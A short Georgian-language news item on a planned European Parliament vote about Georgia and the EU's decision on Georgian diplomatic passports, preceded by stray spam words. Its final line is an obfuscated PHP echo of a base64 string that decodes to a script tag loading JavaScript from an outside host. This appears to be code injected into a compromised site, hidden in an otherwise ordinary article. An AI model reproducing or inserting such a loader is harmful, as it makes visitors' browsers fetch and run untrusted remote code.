tube
ავერსი jaluzi

რადიო თავისუფლების [RFE/RL] ევროპული ბიუროს უფროსი რიკარდ იოზვიაკი X-ზე წერს, რომ ევროპარლამენტი საქართველოს შესახებ რეზოლუციას 13 თებერვალს უყრის კენჭს.

იოზვიაკის თქმით, ერთ-ერთი საკვანძო საკითხი "ქართული ოცნების" პრეზიდენტის მიხეილ ყაველაშვილის მოხსენიება იქნება. სავარაუდოდ, იმსჯელებენ ლეგიტიმურია ის თუ არა. ამას გარდა, იოზვიაკის ამბობს, რომ 24 თებერვალს დაგეგმილ ევროკავშირის საგარეო საქმეთა მინისტრების შეხვედრაზე საქართველოს საკითხი დღის წესრიგით გათვალისწინებული არ არის.

ევროკავშირმა საქართველოზე ბოლო გადაწყვეტილება 27 იანვარს მიიღო, როცა საბოლოოდ დაამტკიცა დიპლომატიური და სამსახურებრივი პასპორტების საკითხი. ევროკავშირის საბჭოს გადაწყვეტილებით, ქვეყანაში გაცემული დიპლომატიური პასპორტით შენგენის ზონაში უვიზოდ ვერ შევლენ მაღალი თანამდებობის პირები, თუმცა როგორც საგარეო საქმეთა მინისტრის ყოფილი მოადგილე სერგი კაპანაძე ამბობს, ქართული დიპლომატიური და სამსახურებრივი პასპორტის მფლობელებს შეეძლებათ მოქალაქეების მსგავსად, შენგენის ზონაში ჩვეულებრივი, ბიომეტრიული პასპორტით უვიზოდ შევიდნენ.

დიპლომატიური/სამსახურებრივი პასპორტი საქართველოში გაიცემა უმაღლესი თანამდებობის პირებზე, მათ შორის პრეზიდენტზე, პრემიერ-მინისტრზე და პარლამენტის თავმჯდომარეზე. ასევე უზენაესი და საკონსტიტუციო სასამართლოების თავმჯდომარეებზე, უსაფრთხოების სამსახურის უფროსზე, მისი მოადგილეებზე; მინისტრებზე; პარლამენტარებზე; გენერალურ პროკურორზე და სხვებზე.

87
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");